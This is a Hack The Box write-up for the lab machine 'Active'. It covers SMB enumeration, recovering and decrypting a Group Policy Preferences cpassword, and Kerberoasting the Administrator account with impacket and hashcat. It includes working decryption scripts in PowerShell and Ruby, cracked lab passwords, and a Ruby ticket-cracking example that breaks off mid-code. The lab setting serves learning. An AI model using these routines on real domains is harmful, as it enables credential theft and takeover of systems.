Active

From Luniwiki

Port scan

root@kali:~/HTB/Machines/Active# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.100 --rate=1000

Starting masscan 1.0.5 at 2019-12-03 19:49:39 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 61581/udp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 9389/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 61157/udp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 53/udp on 10.10.10.100
Discovered open port 3269/tcp on 10.10.10.100
Discovered open port 49169/tcp on 10.10.10.100
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 5722/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 3268/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 47001/tcp on 10.10.10.100
Discovered open port 60900/udp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 49171/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 49182/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 60785/udp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
root@kali:~/HTB/Machines/Active# nmap -sC -sV 10.10.10.100
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-03 14:50 EST
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.043s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2019-12-03 19:50:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2019-12-03T19:51:49
|_  start_date: 2019-12-03T19:14:25

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.91 seconds

Active Directory enumeration

Simple smbclient anonymous enumeration

root@kali:~/HTB/Machines/Active# smbclient -L //10.10.10.100
Enter WORKGROUP\root's password:
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Replication     Disk
	SYSVOL          Disk      Logon server share
	Users           Disk
SMB1 disabled -- no workgroup available

Nullinux setup

root@kali:~/HTB/Utils# git clone https://github.com/m8r0wn/nullinux
Cloning into 'nullinux'...
remote: Enumerating objects: 63, done.
remote: Counting objects: 100% (63/63), done.
remote: Compressing objects: 100% (51/51), done.
remote: Total 383 (delta 27), reused 16 (delta 6), pack-reused 320
Receiving objects: 100% (383/383), 89.01 KiB | 1.20 MiB/s, done.
Resolving deltas: 100% (205/205), done.
root@kali:~/HTB/Utils# cd nullinux/
root@kali:~/HTB/Utils/nullinux# ./setup.sh

[*] Starting nullinux setup script
Collecting ipparser (from -r requirements.txt (line 1))
  Downloading https://files.pythonhosted.org/packages/d3/9d/aeaa797f7278c6dca39b6878a252b03e70cd09a2b956f56bfdcc186cc9ba/ipparser-0.3.5.tar.gz
Requirement already satisfied: dnspython in /usr/lib/python3/dist-packages (from ipparser->-r requirements.txt (line 1)) (1.16.0)
Building wheels for collected packages: ipparser
  Running setup.py bdist_wheel for ipparser ... done
  Stored in directory: /root/.cache/pip/wheels/02/2c/c5/ab538902253acfd931309bbcb10ab441e6b67a0e944802b206
Successfully built ipparser
Installing collected packages: ipparser
Successfully installed ipparser-0.3.5
[*] Checking for smbclient
[+] smbclient installed
[*] nullinux setup complete

Nullinux enumeration

root@kali:~/HTB/Machines/Active# python3 ../../Utils/nullinux/nullinux.py -v 10.10.10.100

Starting nullinux v5.4.1 | 01-05-2020 14:08
[*] Enumerating Shares for: 10.10.10.100
    Shares                          Comments
   -------------------------------------------
    \\10.10.10.100\ADMIN$           Remote Admin
    \\10.10.10.100\C$               Default share
    \\10.10.10.100\IPC$
    \\10.10.10.100\NETLOGON         Logon server share
    \\10.10.10.100\Replication
    \\10.10.10.100\SYSVOL           Logon server share
    \\10.10.10.100\Users

[*] Enumerating: \\10.10.10.100\ADMIN$
    [-] tree connect failed: NT_STATUS_ACCESS_DENIED

[*] Enumerating: \\10.10.10.100\C$
    [-] tree connect failed: NT_STATUS_ACCESS_DENIED

[*] Enumerating: \\10.10.10.100\IPC$
    [-] NT_STATUS_ACCESS_DENIED listing \*

[*] Enumerating: \\10.10.10.100\NETLOGON
    [-] tree connect failed: NT_STATUS_ACCESS_DENIED

[*] Enumerating: \\10.10.10.100\Replication
    .                                   D        0  Sat Jul 21 06:37:44 2018
    ..                                  D        0  Sat Jul 21 06:37:44 2018
    active.htb                          D        0  Sat Jul 21 06:37:44 2018

[*] Enumerating: \\10.10.10.100\SYSVOL
    [-] tree connect failed: NT_STATUS_ACCESS_DENIED

[*] Enumerating: \\10.10.10.100\Users
    [-] tree connect failed: NT_STATUS_ACCESS_DENIED

[*] Enumerating Domain Information for: 10.10.10.100
    [-] Could not attain Domain SID

[*] Enumerating querydispinfo for: 10.10.10.100

[*] Enumerating enumdomusers for: 10.10.10.100

[*] Enumerating LSA for: 10.10.10.100

[*] Performing RID Cycling for: 10.10.10.100
    [-] RID Failed: Could not attain Domain SID

[*] Testing 10.10.10.100 for Known Users

[*] Enumerating Group Memberships for: 10.10.10.100

[*] 0 unique user(s) identified

Download of the Replication share

root@kali:~/HTB/Machines/Active/smbclient/Replication# smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

		10459647 blocks of size 4096. 4931606 blocks available
smb: \> cd active.htb
smb: \active.htb\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 06:37:44 2018
  Policies                            D        0  Sat Jul 21 06:37:44 2018
  scripts                             D        0  Wed Jul 18 14:48:57 2018

		10459647 blocks of size 4096. 4931606 blocks available
smb: \active.htb\> prompt
smb: \active.htb\> recurse
smb: \active.htb\> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.7 KiloBytes/sec) (average 0.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (6.1 KiloBytes/sec) (average 2.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2.9 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (15.3 KiloBytes/sec) (average 5.0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 4.2 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (20.4 KiloBytes/sec) (average 6.5 KiloBytes/sec)

Groups.xml file

root@kali:~/HTB/Machines/Active/smbclient/Replication# find -type f
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI

Among the downloaded files there is an interesting one, Groups.xml, a Group Policy Preferences file that carries a cpassword attribute.

root@kali:~/HTB/Machines/Active/smbclient/Replication# cat "./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml"
<?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Cpassword from Groups.xml

Microsoft's open specification MS-GPPREF documents that Group Policy Preferences files such as Groups.xml carry the account name and, in the cpassword attribute, the password of the accounts they manage. The password is AES-256-CBC encrypted, but the 32-byte key is printed in the specification itself, so anyone who can read SYSVOL (every domain user, and here even an anonymous session) can recover it. Microsoft stopped Group Policy from writing new cpassword values with MS14-025 (2014), but values already in SYSVOL stay there until the preference item is deleted or recreated, which is why this is still worth checking on every domain.

root@kali:~/HTB/Utils# git clone https://github.com/PowerShellMafia/PowerSploit
root@kali:~/HTB/Utils# cd PowerSploit/Exfiltration
root@kali:~/HTB/Utils/PowerSploit/Exfiltration# view Get-GPPPassword.ps1

Powershell script

Inspired by that script, the routine below decrypts the cpassword from the Groups.xml file.

root@kali:~/HTB/Machines/Active# cat Get-DecryptedCpassword.ps1
function Get-DecryptedCpassword {
    Param (
        [string] $Cpassword
    )

    try {
        # Append appropriate padding based on string length
        $Mod = ($Cpassword.length % 4)
        switch ($Mod) {
            '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
            '2' {$Cpassword += ('=' * (4 - $Mod))}
            '3' {$Cpassword += ('=' * (4 - $Mod))}
        }

        $Base64Decoded = [Convert]::FromBase64String($Cpassword)

        # Create a new AES .NET Crypto Object
        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                             0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

        # Set IV to all nulls to prevent dynamic generation of IV value
        $AesIV = New-Object Byte[]($AesObject.IV.Length)
        $AesObject.IV = $AesIV
        $AesObject.Key = $AesKey
        $DecryptorObject = $AesObject.CreateDecryptor()
        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)

        # The plaintext is UTF-16LE ("Unicode" in .NET terms)
        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    }
    catch {Write-Error $Error[0]}
}

Get-DecryptedCpassword 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'

Dot-sourcing the script runs the call at its end and prints the service account's password.

root@kali:~/HTB/Machines/Active# pwsh
PowerShell 6.2.3
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs Type 'help' to get help.
PS /root/HTB/Machines/Active> . ./Get-DecryptedCpassword.ps1
GPPstillStandingStrong2k18
PS /root/HTB/Machines/Active> exit

Alternative way with gpp-decrypt

Another way to decrypt the password is the gpp-decrypt command.

root@kali:~/HTB/Machines/Active# gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18

gpp-decrypt is a Ruby script shipped with Kali. The warning comes from its use of the deprecated OpenSSL::Cipher::Cipher constant and does not affect the result.

Alternative way manually with openssl

The cpassword is base64, but Group Policy Preferences stores it without the trailing '=' padding, so a strict decoder rejects it. Valid base64 ends in zero, one or two '=' characters, and the count follows from the length: this string is 86 characters long, 86 mod 4 = 2, so two are needed. With none or only one, base64 -d still fails.

root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" | base64 -d 1>/dev/null
base64: invalid input
root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ=" | base64 -d 1>/dev/null
base64: invalid input
root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==" | base64 -d 1>/dev/null

The decoded bytes are decrypted with openssl, passing Microsoft's key in hex with -K and an all-zero IV. openssl warns that the IV string "0" is too short and pads it with zero bytes to the full 16-byte IV, which is exactly what is wanted here. The plaintext is UTF-16LE, so the output actually contains a NUL byte after every character; the terminal hides them, but convert from UTF-16LE before feeding the result to another tool.

root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==" | base64 -d | openssl aes-256-cbc -d -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0
hex string is too short, padding with zero bytes to length
GPPstillStandingStrong2k18

The separate base64 decode can be dropped by passing -a, which makes openssl decode base64 input itself.

root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==" | openssl aes-256-cbc -d -a -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0 
hex string is too short, padding with zero bytes to length
GPPstillStandingStrong2k18
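Added example (mine, not from the original page, PowerSploit or gpp-decrypt): a Ruby version, gpp-decrypt's own language, of what the PowerShell function, gpp-decrypt and the openssl one-liners above each do, in one routine: restore the base64 padding that GPP strips, decrypt with AES-256-CBC under the MS-GPPREF key and an all-zero IV, let the cipher remove the PKCS#7 padding, and decode the UTF-16LE plaintext (the source of the NUL bytes in the raw openssl output). It also pulls account/cpassword pairs out of the Groups.xml recovered above, using the account attribute names Get-GPPPassword.ps1 handles for the other GPP file types. It needs only the Ruby standard library and touches no network.

```ruby
require 'openssl'

# AES-256 key Microsoft publishes in the MS-GPPREF open specification; the same
# bytes appear in Get-GPPPassword.ps1 and in the openssl -K argument above.
GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')

# The cpassword from the Groups.xml recovered on this page.
ACTIVE_CPASSWORD = 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'

# Group Policy Preferences strips the '=' padding from the base64 cpassword.
# Restore it so a strict decoder accepts the string. A length of 1 mod 4 cannot
# occur in valid base64; Get-GPPPassword.ps1 drops the trailing character then.
def restore_base64_padding(cpassword)
  s = cpassword.strip
  case s.length % 4
  when 1 then s[0...-1]
  when 2 then s + '=='
  when 3 then s + '='
  else s
  end
end

def decrypt_cpassword(cpassword)
  blob = restore_base64_padding(cpassword).unpack('m0')[0]   # 'm0' = strict base64
  cipher = OpenSSL::Cipher.new('aes-256-cbc')   # not the deprecated OpenSSL::Cipher::Cipher
  cipher.decrypt
  cipher.key = GPP_AES_KEY
  cipher.iv = "\x00" * 16                       # MS-GPPREF prescribes an all-zero IV
  plain = cipher.update(blob) + cipher.final    # #final strips the PKCS#7 padding
  plain.force_encoding('UTF-16LE').encode('UTF-8')  # GPP stores the password as UTF-16LE
end

# Return [account, password] for every Properties element carrying a cpassword.
# A regex over the element is enough here and avoids an XML parser dependency.
# userName: Groups.xml/Drives.xml; accountName: Services.xml; runAs:
# ScheduledTasks.xml; username: DataSources.xml/Printers.xml.
def extract_gpp_credentials(xml)
  xml.scan(/<Properties\b[^>]*>/).map do |props|
    cpw = props[/\bcpassword="([^"]*)"/, 1]
    next if cpw.nil? || cpw.empty?
    user = props[/\b(?:userName|accountName|runAs|username)="([^"]*)"/, 1]
    [user, decrypt_cpassword(cpw)]
  end.compact
end

# The Groups.xml recovered from the Replication share above.
SAMPLE_GROUPS_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="#{ACTIVE_CPASSWORD}" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
  </Groups>
XML

if __FILE__ == $PROGRAM_NAME
  extract_gpp_credentials(SAMPLE_GROUPS_XML).each { |user, pw| puts "#{user} : #{pw}" }
end
```

Run it against every *.xml under SYSVOL\<domain>\Policies, not only Groups.xml; the attribute name changes per file type but the cpassword encoding does not.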

User Flag

root@kali:~/HTB/Machines/Active# smbclient \\\\10.10.10.100\\Users -U SVC_TGS
Enter WORKGROUP\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \> get SVC_TGS\Desktop\user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as SVC_TGS\Desktop\user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
root@kali:~/HTB/Machines/Active# cat SVC_TGS\\Desktop\\user.txt
<USER_FLAG>

Kerberoasting

Kerberoasting abuses the way service accounts are tied to Service Principal Names (SPNs) in Kerberos. Any authenticated domain user can ask the KDC for a service ticket (TGS) for any SPN, and the KDC hands it out without checking whether the requester may actually use the service. The ticket's encrypted part is encrypted with the service account's long-term key; for etype 23 (RC4-HMAC) that key is the account's NT hash, so the ticket can be attacked offline by hashing candidate passwords and checking the ticket's HMAC. Offline cracking causes no lockouts, but it is not invisible: the domain controller logs each request as event 4769, and a burst of RC4 (etype 0x17) service-ticket requests from one user is a standard detection. Once cracked, you have the service account's password in clear text. Here the SPN active/CIFS:445 belongs to Administrator, so the domain is the prize.

Install the impacket tools

root@kali:~/HTB/Utils# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 29, done.
remote: Counting objects: 100% (29/29), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 17215 (delta 9), reused 13 (delta 5), pack-reused 17186
Receiving objects: 100% (17215/17215), 5.71 MiB | 18.16 MiB/s, done.
Resolving deltas: 100% (13131/13131), done.

root@kali:~/HTB/Utils# cd impacket/
root@kali:~/HTB/Utils/impacket# python setup.py install

Retrieve SPN tickets

root@kali:~/HTB/Machines/Active# ../../Utils/impacket/examples/GetUserSPNs.py -request active.htb/SVC_TGS  -outputfile SPN2hashcat
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2018-07-30 13:17:40.656520

GetUserSPNs.py requested the service ticket and wrote its encrypted part in hashcat's $krb5tgs$ format.

root@kali:~/HTB/Machines/Active# cat SPN2hashcat
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$66be5612a75e8b848bee009cc6f1cd3d$0704e0568964fb5f33d76802ac1365a34bc12a1b6db6df1aa5c534a4a23fd377c00790dd615acc790bb1e43498d256cc5b85fb9b2dc500c96a268858ca14599f3750356054bcce04e04e50ef3d4f2b4dd43d18b868ad4db1865e3088c30ebd7079e8356fb74cf02c8635c143c13b640bd9cf641c858444ab2448351e1bbd52fa7352010a2d362b4d7a8d4f5fe35aab9ae2ca69057edad31eb350493f2ecfc359e16406c885ffde8b9252eb8a19e02c4b453e23534b23ba62776516cab94efb3e690d5761af91c756bab200330057347a33c99a55d4522dd80d72be52d805749f11a6b10c10be450087fbc3eab2efef26e4d21eff2c0a338589e090900d5ff5d0fef4bb07a2fc11387e056a36da505e9093d65f14d24b8fa711eb8a24307b3f6111844678c1a37394a2710f4feaf0e60506ee4b94314e209b1ddd62e52bd1bb16e758d0cc0a06f03c3decc79e5db686085987ac8c04e8e8a8e6e80e50ad67023c4495d185d6b0555a9921b6217d52e2a822a5ec9243d56667f0d02a826d1101b0ee8f6e3e43ef9f1776e846dc5265f150fff46c643540b8e2eed66c70c3af8ed8c3d44c82c0c70ce569b3bd584ca41920cce2285055134baec2fe3e368834baa83dbf3c550ed918581fd73920efc22b2a3f454ecf7446adf0fd0ae0c970149ee75c98b453ee666989716b4e876bce3ee998c3d215cf0df3350ab92536e8a4f153e72e46ab01a76159e46f2d68c5a836ffde9e24f8b58bb72f84acc13f6fc745f6247e3ed2200b99752da6eeead1b5c30a4cdd1448fd6ca8b41f9bc68b150a2118df7080ba6739f7c68b33e73b17fbd9d0797bfe2f0dcc083cf011f248a22d04f4359376eb1effa89f052be0841ca69022a09d07381856953fa6717c7187b0a302d1b3c582000dbac6c91c83759fb812c66e7d7ffb35552b3b9015b5c9de93bfb33867792a54616a9aed330dfefe79cf3ceeca5df6d46ca2e8c6adf3e6165e922f6c8adb76e3231fba3e00294d72de9041ae048b97364b68d601210a76703e23fbbb972ca952feb34ea1f25b30ba412896d35131effb417dd37184e0f5523a62668c060c9fa57020ca8774be4f624841307bfa76185fd9327f22cf914cd4df65c85f2e941e90dc798ce2626d82e901abfe7ea85b868600ee91be0fd241dfbf942f3e0dc34a0a3485feccf2ff13e788414a7d665d0568fcc67a08836e0e06bdb62f925269d32d3d0ef509790bdf11b38065b97052b108128b646388

Crack the ticket

root@kali:~/HTB/Machines/Active# hashcat -m 13100 SPN2hashcat --force /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 2048/5878 MB allocatable, 8MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=13100 -D _unroll'
Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...646388
Time.Started.....: Tue Jan 21 16:49:17 2020 (8 secs)
Time.Estimated...: Tue Jan 21 16:49:32 2020 (7 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   911.8 kH/s (7.53ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 7798784/14344384 (54.37%)
Rejected.........: 0/7798784 (0.00%)
Restore.Point....: 7798784/14344384 (54.37%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: grega001 -> gooooal

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$66be5612a75e8b848bee009cc6f1cd3d$[...same ticket as in SPN2hashcat above...]:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...646388
Time.Started.....: Tue Jan 21 16:49:17 2020 (11 secs)
Time.Estimated...: Tue Jan 21 16:49:28 2020 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   910.2 kH/s (7.47ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10551296/14344384 (73.56%)
Rejected.........: 0/10551296 (0.00%)
Restore.Point....: 10534912/14344384 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tiona172 -> TUGGAB8

Started: Tue Jan 21 16:49:16 2020
Stopped: Tue Jan 21 16:49:29 2020

The Administrator password is Ticketmaster1968.
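Added example, not part of the original writeup: the check hashcat runs for -m 13100, written in Ruby to show why the cracking needs no further contact with the KDC. It parses the $krb5tgs$23$ line GetUserSPNs.py produced above, derives the RC4-HMAC keys from a candidate's NT hash as RFC 4757 specifies for key usage 2 (the TGS-REP ticket enc-part), decrypts the ticket and accepts the candidate when the recomputed HMAC-MD5 equals the ticket's checksum. MD4 and RC4 are implemented by hand because OpenSSL 3 only provides them through its legacy provider. The ticket is the one captured on this page; the three-entry candidate list standing in for rockyou.txt is constructed.

```ruby
require 'openssl'

MASK32 = 0xffffffff

def rotl32(x, n)
  ((x << n) | (x >> (32 - n))) & MASK32
end

# MD4 (RFC 1320) in pure Ruby: OpenSSL 3 ships MD4 and RC4 only in its legacy
# provider, so OpenSSL::Digest::MD4 and the 'rc4' cipher are often unavailable.
def md4(message)
  msg = message.dup.force_encoding('BINARY')
  bit_len = msg.bytesize * 8
  msg << "\x80".b
  msg << "\x00".b while msg.bytesize % 64 != 56
  msg << [bit_len & MASK32, bit_len >> 32].pack('V2')
  f = ->(x, y, z) { (x & y) | (~x & z) }
  g = ->(x, y, z) { (x & y) | (x & z) | (y & z) }
  h = ->(x, y, z) { x ^ y ^ z }
  rounds = [
    [f, 0x00000000, [3, 7, 11, 19], (0..15).to_a],
    [g, 0x5a827999, [3, 5, 9, 13],  [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]],
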